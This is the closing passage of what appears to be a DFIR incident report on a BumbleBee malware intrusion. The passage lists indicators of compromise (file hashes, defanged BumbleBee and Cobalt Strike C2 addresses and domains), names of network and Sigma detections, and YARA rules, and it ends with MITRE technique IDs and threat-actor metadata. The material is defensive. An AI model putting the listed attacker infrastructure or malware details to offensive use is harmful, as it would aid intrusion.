time.\r\nIndicators\r\nFiles\r\nBC_invoice_Report_CORP_46.zip\r\n5226b7138f4dd1dbb9f6953bd75a320b\r\n6c87ca630c294773ab760d88587667f26e0213a3\r\nc1b8e9d77a6aea4fc7bed4a2a48515aa32a3922859c9091cecf1b5f381a87127\r\ndocument.lnk\r\n3466ffaf086a29b8132e9e10d7111492\r\n58739dc62eeac7374db9a8c07df7c7c36b550ce5\r\n90f489452b4fe3f15d509732b8df8cc86d4486ece9aa10cbd8ad942f7880075e\r\nnamr.dll\r\nf856d7e7d485a2fc5b38faddd8c6ee5c\r\nc68e4d5eaae99d6f0a51eec48ace79a4fede3c09\r\n2d67a6e6e7f95d3649d4740419f596981a149b500503cbc3fcbeb11684e55218\r\nwab.exe\r\nc68437cc9ed6645726119c12fdcb33e7\r\n7a3db4b3359b60786fcbdaf0115191502fcded07\r\n1cf28902be615c721596a249ca85f479984ad85dc4b19a7ba96147e307e06381\r\naf.exe\r\n9b02dd2a1a15e94922be3f85129083ac\r\n2cb6ff75b38a3f24f3b60a2742b6f4d6027f0f2a\r\nb1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682\r\nVulnRecon.exe\r\n5839b4013cf6e25568f13d3fc4120795\r\nd9832b46dd6f249191e9cbcfba2222c1702c499a\r\neb4cba90938df28f6d8524be639ed7bd572217f550ef753b2f2d39271faddaef\r\nVulnRecon.dll\r\n951d017ba31ecc6990c053225ee8f1e6\r\na204f20b1c96c5b882949b93eb4ac20d4f9e4fdf\r\na9e90587c54e68761be468181e56a5ba88bac10968ff7d8c0a1c01537158fbe8\r\nCommandLine.dll\r\n3654f4e4c0858a9388c383b1225b8384\r\n974ffbfae36e9a41ac672f9793ce1bee18f2e670\r\nfa2b74bfc9359efba61ed7625d20f9afc11a7933ebc9653e8e9b1e44be39c455\r\nw.bat\r\nbba3ff461eee305c7408e31e427f57e6\r\n3300c0c05b33691ecc04133885b7fc9513174746\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 25 of 28\n\n59198ffaf74b0e931a1cafe78e20ebf0b16f3a5a03bb4121230a0c44d7b963d2\r\ns.bat\r\n4b78228c08538208686b0f55353fa3bf\r\n67707f863aa405a9b9a335704808c604845394bf\r\n5eb0b0829b9fe344bff08de80f55a21a26a53df7bd230d777114d3e7b64abd24\r\nNetwork\r\nBumbleBee\r\n142.91.3[.]109\r\n45.140.146[.]30\r\nCobalt Strike\r\n45.153.243[.]142\r\nfuvataren[.]com\r\n108.62.12[.]174\r\ndofixifa[.]com\r\nCobalt Strike Payload Hosting\r\n104.243.33[.]50\r\nDetections\r\nNetwork\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)\r\nET POLICY SMB Executable File Transfer\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET USER_AGENTS AnyDesk Remote Desktop Software User-Agent\r\n(Snort VRT) MALWARE-OTHER CobaltStrike powershell web delivery attempt\r\nSigma\r\nhttps://github.com/SigmaHQ/sigma/blob/d459483ef6bb889fb8da1baa17a713a4f1aa8897/rules/windows/file_event/file_event_win_iso_file_recent.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/8bb3379b6807610d61d29db1d76f5af4840b8208/rules/windows/process_creation/proc_creation_win_rundll32\r\nhttps://github.com/SigmaHQ/sigma/blob/7f490d958aa7010f7f519e29bed4a45ecebd152e/rules/windows/process_creation/proc_creation_win_susp_pow\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml\r\nYara\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2022-08-08\r\nIdentifier: BumbleBee Case 13387\r\nReference: https://thedfirreport.com\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nrule bumblebee_13387_VulnRecon_dll {\r\n meta:\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 26 of 28\n\ndescription = \"BumbleBee - file VulnRecon.dll\"\n author = \"TheDFIRReport\"\n reference = \"https://thedfirreport.com\"\n date = \"2022-08-08\"\n hash1 = \"a9e90587c54e68761be468181e56a5ba88bac10968ff7d8c0a1c01537158fbe8\"\n strings:\n $x1 = \"Use VulnRecon.exe -i, --SystemInfo to execute this command\" fullword wide\n $x2 = \"Use VulnRecon.exe -v, --Vulnerability to execute this command\" fullword wide\n $x3 = \"Use VulnRecon.exe -h, --HotFixes to execute this command\" fullword wide\n $x4 = \"Use VulnRecon.exe -m, --MicrosoftUpdates to execute this command\" fullword wide\n $x5 = \"Use VulnRecon.exe -s, --SupportedCve to execute this command\" fullword wide\n $s6 = \"VulnRecon.dll\" fullword wide\n $s7 = \"VulnRecon.Commands.SystemCommands\" fullword ascii\n $s8 = \"VulnRecon.Commands.CveCommands\" fullword ascii\n $s9 = \"VulnRecon.Commands\" fullword ascii\n $s10 = \"VulnRecon.CommandLine\" fullword ascii\n $s11 = \"D:\\\\work\\\\rt\\\\VulnRecon\\\\VulnRecon\\\\obj\\\\Release\\\\net5.0\\\\VulnRecon.pdb\" fullword ascii\n $s12 = \"VulnRecon.Commands.ToolsCommand\" fullword ascii\n $s13 = \"Using VulnRecon.exe -o or VulnRecon.exe --OptionName\" fullword wide\n $s14 = \"commandVersion\" fullword ascii\n $s15 = \"GetSystemInfoCommand\" fullword ascii\n $s16 = \"CreateGetSupportedCveCommand\" fullword ascii\n $s17 = \"CreateWindowsVersionCommand\" fullword ascii\n $s18 = \" \" fullword ascii\n $s19 = \"get_CommandVersion\" fullword ascii\n $s20 = \"k__BackingField\" fullword ascii\n condition:\n uint16(0) == 0x5a4d and filesize \u003c 50KB and\n 1 of ($x*) and 4 of them\n}\nrule bumblebee_13387_VulnRecon_exe {\n meta:\n description = \"BumbleBee - file VulnRecon.exe\"\n author = \"TheDFIRReport\"\n reference = \"https://thedfirreport.com\"\n date = \"2022-08-08\"\n hash1 = \"eb4cba90938df28f6d8524be639ed7bd572217f550ef753b2f2d39271faddaef\"\n strings:\n $s1 = \"hostfxr.dll\" fullword wide\n $s2 = \"--- Invoked %s [version: %s, commit hash: %s] main = {\" fullword wide\n $s3 = \"This executable is not bound to a managed DLL to execute. The binding value is: '%s'\" fullword wi\n $s4 = \"D:\\\\a\\\\_work\\\\1\\\\s\\\\artifacts\\\\obj\\\\win-x64.Release\\\\corehost\\\\cli\\\\apphost\\\\standalone\\\\Release\\\n $s5 = \"VulnRecon.dll\" fullword wide\n $s6 = \"api-ms-win-crt-runtime-l1-1-0.dll\" fullword ascii\n $s7 = \" - %s\u0026apphost_version=%s\" fullword wide\n $s8 = \"api-ms-win-crt-convert-l1-1-0.dll\" fullword ascii\n $s9 = \"api-ms-win-crt-math-l1-1-0.dll\" fullword ascii\n $s10 = \"api-ms-win-crt-time-l1-1-0.dll\" fullword ascii\n $s11 = \"api-ms-win-crt-stdio-l1-1-0.dll\" fullword ascii\n $s12 = \"api-ms-win-crt-heap-l1-1-0.dll\" fullword ascii\n $s13 = \"api-ms-win-crt-string-l1-1-0.dll\" fullword ascii\n $s14 = \"The managed DLL bound to this executable is: '%s'\" fullword wide\n $s15 = \"A fatal error was encountered. This executable was not bound to load a managed DLL.\" fullword wi\n $s16 = \"api-ms-win-crt-locale-l1-1-0.dll\" fullword ascii\n $s17 = \"Showing error dialog for application: '%s' - error code: 0x%x - url: '%s'\" fullword wide\n $s18 = \"Failed to resolve full path of the current executable [%s]\" fullword wide\n $s19 = \"https://go.microsoft.com/fwlink/?linkid=798306\" fullword wide\n $s20 = \"The managed DLL bound to this executable could not be retrieved from the executable image.\" full\n condition:\n uint16(0) == 0x5a4d and filesize \u0026lt; 400KB and\n all of them\n}\nrule bumblebee_13387_wab {\n meta:\n description = \"BumbleBee - file wab.exe\"\n author = \"TheDFIRReport\"\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\nPage 27 of 28\n\nreference = \"https://thedfirreport.com\"\r\n date = \"2022-08-08\"\r\n hash1 = \"1cf28902be615c721596a249ca85f479984ad85dc4b19a7ba96147e307e06381\"\r\n strings:\r\n $s1 = \"possibility terminate nation inch ducked ski accidentally usage absent reader rowing looking smac\r\n $s2 = \"pfxvex450gd81.exe\" fullword ascii\r\n $s3 = \"31403272414143\" ascii /* hex encoded string '1@2rAAC' */\r\n $s4 = \"s wolf save detail surgery short vigour uttered fake proposal moustache accustomed lock been vege\r\n $s5 = \"130 Dial password %d propose7177! Syllable( warrior stretching Angry 83) sabotage %s\" fullword wi\r\n $s6 = \"possibility terminate nation inch ducked ski accidentally usage absent reader rowing looking smac\r\n $s7 = \"accomplish course Content 506) arched organ Travels\" fullword ascii\r\n $s8 = \"123 serve edit. 693 Poison@ mercy \" fullword wide\r\n $s9 = \"Top wealthy! fish 760? pier%complaint July nicer! 587) %s shark+ \" fullword wide\r\n $s10 = \" Approximate- Choked- %s %s, \" fullword wide\r\n $s11 = \"niece beacon dwelling- Headlong Intellectual+\" fullword ascii\r\n $s12 = \"\u003eCertainty holes) cherries Proceeding Active+ surname Rex/ gets\" fullword wide\r\n $s13 = \"+Enthusiastic@ Couple? %s, shy %d %d) plume \" fullword wide\r\n $s14 = \" again workroom front leader height mantle mother sudden illness discontent who finest southern\r\n $s15 = \"Advantage %s+ Creation. officially/ Affirmative %s? %s \" fullword ascii\r\n $s16 = \"Mind@ falcon+ illumination repair/ %s! \" fullword ascii\r\n $s17 = \"%Truthful- %d/ 161! Checking 786/ Mob \" fullword wide\r\n $s18 = \"#%s. %s Door observed- lazy? Quiet@ \" fullword wide\r\n $s19 = \"wrong comer? %s) Designer$ 372\" fullword wide\r\n $s20 = \"Fleet( %d, lads. %d! %d %s 445\" fullword wide\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 200KB and\r\n 8 of the\r\nMITRE\r\nPhishing – T1566\r\nMalicious File – T1204.002\r\nWindows Command Shell – T1059.003\r\nPowerShell – T1059.001\r\nProcess Injection – T1055\r\nFile Deletion – T1070.004\r\nLSASS Memory – T1003.001\r\nKerberoasting – T1558.003\r\nDomain Account – T1087.002\r\nDomain Trust Discovery – T1482\r\nLateral Tool Transfer – T1570\r\nRemote Desktop Protocol – T1021.001\r\nValid Accounts – T1078\r\nRemote Access Software – T1219\r\nIngress Tool Transfer – T1105\r\nWeb Protocols – T1071.001\r\nSystem Services – T1569\r\nSMB/Windows Admin Shares – T1021.002\r\nSoftware Discovery – T1518\r\nSystem Network Configuration Discovery – T1016\r\nRemote System Discovery – T1018\r\nProcess Discovery – T1057\r\nMark-of-the-Web Bypass – T1553.005\r\nMasquerading – T1036\r\nRundll32 – T1218.011\r\nDomain Groups – T1069.002\r\nWindows Management Instrumentation – T1047\r\nPassword Guessing – T1110.001\r\nInternal case #13387\r\nSource: https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\r\nPage 28 of 28", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/" ], "report_names": [ "bumblebee-roasts-its-way-to-domain-admin" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4594f985-865e-4862-8047-2e80226e246a", "created_at": "2022-10-27T08:27:12.984825Z", "updated_at": "2026-04-10T02:00:05.293575Z", "deleted_at": null, "main_name": "EXOTIC LILY", "aliases": [ "EXOTIC LILY" ], "source_name": "MITRE:EXOTIC LILY", "tools": [ "Bazar" ], "source_id": "MITRE", "reports": null }, { "id": "f6f91e1c-9202-4497-bf22-9cd5ef477600", "created_at": "2023-01-06T13:46:38.86765Z", "updated_at": "2026-04-10T02:00:03.12735Z", "deleted_at": null, "main_name": "WIZARD SPIDER", "aliases": [ "TEMP.MixMaster", "GOLD BLACKBURN", "DEV-0193", "UNC2053", "Pistachio Tempest", "DEV-0237", "Storm-0230", "FIN12", "Periwinkle Tempest", "Storm-0193", "Trickbot LLC" ], "source_name": "MISPGALAXY:WIZARD SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e", "created_at": "2024-06-04T02:03:07.799286Z", "updated_at": "2026-04-10T02:00:03.606456Z", "deleted_at": null, "main_name": "GOLD BLACKBURN", "aliases": [ "ITG23 ", "Periwinkle Tempest ", "Wizard Spider " ], "source_name": "Secureworks:GOLD BLACKBURN", "tools": [ "BazarLoader", "Buer Loader", "Bumblebee", "Dyre", "Team9", "TrickBot" ], "source_id": "Secureworks", "reports": null }, { "id": "56384d06-abc2-4853-8440-db4d7b7d1b5f", "created_at": "2023-01-06T13:46:39.367122Z", "updated_at": "2026-04-10T02:00:03.303733Z", "deleted_at": null, "main_name": "EXOTIC LILY", "aliases": [ "DEV-0413" ], "source_name": "MISPGALAXY:EXOTIC LILY", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "63061658-5810-4f01-9620-7eada7e9ae2e", "created_at": "2022-10-25T15:50:23.752974Z", "updated_at": "2026-04-10T02:00:05.244531Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193" ], "source_name": "MITRE:Wizard Spider", "tools": [ "TrickBot", "AdFind", "BITSAdmin", "Bazar", "LaZagne", "Nltest", "GrimAgent", "Dyre", "Ryuk", "Conti", "Emotet", "Rubeus", "Mimikatz", "Diavol", "PsExec", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "a2d3f35f-3b29-4509-bff5-af2638140d39", "created_at": "2022-10-25T16:07:23.633982Z", "updated_at": "2026-04-10T02:00:04.695802Z", "deleted_at": null, "main_name": "FIN12", "aliases": [], "source_name": "ETDA:FIN12", "tools": [ "Agentemis", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "KEGTAP", "TSPY_TRICKLOAD", "Team9Backdoor", "The Trick", "TheTrick", "Totbrick", "TrickBot", "TrickLoader", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3", "created_at": "2022-10-25T16:07:24.422115Z", "updated_at": "2026-04-10T02:00:04.983298Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "DEV-0193", "G0102", "Gold Blackburn", "Gold Ulrick", "Grim Spider", "ITG23", "Operation BazaFlix", "Periwinkle Tempest", "Storm-0230", "TEMP.MixMaster", "Wizard Spider" ], "source_name": "ETDA:Wizard Spider", "tools": [ "AdFind", "Agentemis", "Anchor_DNS", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "Conti", "Diavol", "Dyranges", "Dyre", "Dyreza", "Dyzap", "Gophe", "Invoke-SMBAutoBrute", "KEGTAP", "LaZagne", "LightBot", "PowerSploit", "PowerTrick", "PsExec", "Ryuk", "SessionGopher", "TSPY_TRICKLOAD", "Team9Backdoor", "The Trick", "TheTrick", "Totbrick", "TrickBot", "TrickLoader", "TrickMo", "Upatre", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434357, "ts_updated_at": 1775826788, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c2b59de92052209cbcb40bbe53c4c82efb43ed02.pdf", "text": "https://archive.orkl.eu/c2b59de92052209cbcb40bbe53c4c82efb43ed02.txt", "img": "https://archive.orkl.eu/c2b59de92052209cbcb40bbe53c4c82efb43ed02.jpg" } }